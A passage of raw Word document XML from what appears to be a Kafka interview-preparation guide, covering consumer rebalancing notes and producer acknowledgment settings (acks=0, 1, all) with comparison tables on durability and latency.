      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="5BD7CA4C" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="246667B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07A4E45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rebalance disruption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="35344F13" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00789B6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2DEE976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unnecessary rebalances</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="4EF067BD" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32CA516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gger startup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16A18EC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rebalancing storms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="222528BE" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77C8994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fig tuning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65AC682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rove stability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="3305C67E" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0698C2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 planning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D766B7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efficiently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57E503AE" w14:textId="5E96D6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524" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CB01CE" w14:textId="42132982" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="001C3542" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="873" w:name="_Toc197868087"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the role of Kafka's Producer Acknowledgments</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="873"/>
    </w:p>
    <w:p w14:paraId="2D5F4F16" w14:textId="1DFF7ED4" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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Role of Kafka’s Producer Acknowledgments (acks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C69B89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 acknowledgments determine </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how many brokers must confirm receipt of a message</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> before it is considered successfully "sent". This impacts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDC2CA9"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urability</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA3021"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tency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F052892"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hroughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F246EC"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delivery guarantees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6097BC6D"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3BDDE8">
          <v:rect id="_x0000_i3525" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="382482A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Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB43CF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set the acks parameter in the producer config as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C92DD5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or "0", "1", "all"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29413854"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BCDD00">
          <v:rect id="_x0000_i3526" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="461AC88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3704"/>
        <w:gridCol w:w="1410"/>
        <w:gridCol w:w="1324"/>
        <w:gridCol w:w="2621"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="58AB0971" w14:textId="77777777" w:rsidTr="00F04AF9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C8ADC7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4638DF1B"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0ED3DDC9"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urability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70F02CB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48F0CB1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isk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="5FDCACCB" w14:textId="77777777" w:rsidTr="00F04AF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34960BB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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B4C59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ack</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from Kafka. Producer doesn't wait for any response.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B08CA1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5B3C8B2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3CB3FC23"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 risk of data loss</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="334FDEE3" w14:textId="77777777" w:rsidTr="00F04AF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FDDDF0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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DC21656"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ader broker </w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>acks after writing to its log</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, not waiting for followers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49DFD8A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B88535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7F313E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Risk if leader crashes before replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="22F67151" w14:textId="77777777" w:rsidTr="00F04AF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A266D0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 (or -1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F307E3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1267601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Highest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22DF521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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C5C109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st reliable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6365E3E6"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775365">
          <v:rect id="_x0000_i3527" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E4E697"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266F08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0C9C271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5D954F4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Wait for all replicas to acknowledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440F95D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24F4F9C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520285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1DB900B4" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9" w:rsidP="004269A3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D5CC47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4AEA0995"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C7100D">
          <v:rect id="_x0000_i3528" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7E78BE"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2258"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="4DD35A0F" w14:textId="77777777" w:rsidTr="00F04AF9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01EABBD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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2533C32D"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0B1C8ACB" w14:textId="77777777" w:rsidTr="00F04AF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4032D195"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tolerate loss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="789F1CB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r>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="3FCCDE8B" w14:textId="77777777" w:rsidTr="00F04AF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6105552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 between safety and speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24A096F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r>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="131EB7E4" w14:textId="77777777" w:rsidTr="00F04AF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31825FA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data, need durability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="719C4562"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1210FC47" w14:textId="7EE144E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A93E8D5">
          <v:rect id="_x0000_i3529" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AAEB5D" w14:textId="341AF370" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45115" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="874" w:name="_Toc197868088"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Discuss the different acknowledgment levels (acks=0, acks=1, acks=all) in Kafka producers and their impact on message delivery reliability</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="874"/>
    </w:p>
    <w:p w14:paraId="4CD75D6E" w14:textId="60EE3F09" w:rsidR="00D24F56" w:rsidRPr="004269A3" w:rsidRDefault="00D24F56"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breakdown of the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different acknowledgment levels in Kafka producers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (acks) and how they impact </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message delivery reliability, latency, and durability</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D283593"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FE25FD">
          <v:rect id="_x0000_i3530" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9C48D5"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in Kafka Producers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A2D3B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acks parameter controls </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how many Kafka brokers must acknowledge</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the receipt of a message before the producer considers it </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>successfully sent</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A1FAF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0");   // or "1", "all"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26268305"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41A61">
          <v:rect id="_x0000_i3531" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7D18C1"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2622"/>
        <w:gridCol w:w="2152"/>
        <w:gridCol w:w="1388"/>
        <w:gridCol w:w="2684"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="244B2125" w14:textId="77777777" w:rsidTr="00D24F56">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="102B77F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6EA5D5A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6B027E32"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liability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59B0413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59C2E153"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r>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="08ADAD5D" w14:textId="77777777" w:rsidTr="00D24F56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="714342CF"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C66EC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t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>doesn’t wait</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for any acknowledgment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="537E257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 (no durability guarantee)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2970919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Fastest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E8E004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throughput logging, non-critical data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="1AA40F75" w14:textId="77777777" w:rsidTr="00D24F56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09E08F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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06E0476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aits for </w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ack from leader</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> broker only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6520D0E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 (risk if leader fails before replication)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36FBF40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derate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ACCB761"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scenarios, where speed matters but some reliability is needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="21DF23CD" w14:textId="77777777" w:rsidTr="00D24F56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22F1C1D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all or acks=-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FA7044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355B7B6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 (durability ensured)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1199B1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Slowest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
